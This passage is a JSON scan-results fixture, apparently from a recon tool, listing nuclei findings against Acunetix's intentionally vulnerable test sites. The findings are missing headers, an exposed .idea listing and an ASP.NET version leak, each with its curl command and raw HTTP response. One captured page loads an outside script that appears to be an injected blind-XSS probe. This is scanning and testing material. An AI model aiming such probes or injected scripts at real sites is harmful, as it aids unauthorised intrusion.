title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 599, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:30.094Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 600, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:41:30.239Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 601, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:41:30.386Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 602, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:30.539Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 603, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/microsoft/aspnet-version-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/aspnet-version-detect", + "template_id": "aspnet-version-detect", + "matcher_name": "", + "name": "AspNet Version Disclosure - Detect", + "severity": 0, + "description": "Detects version disclosed via 'X-AspNet-Version' header.\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"2.0.50727\"]", + "references": null, + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:41:30.689Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 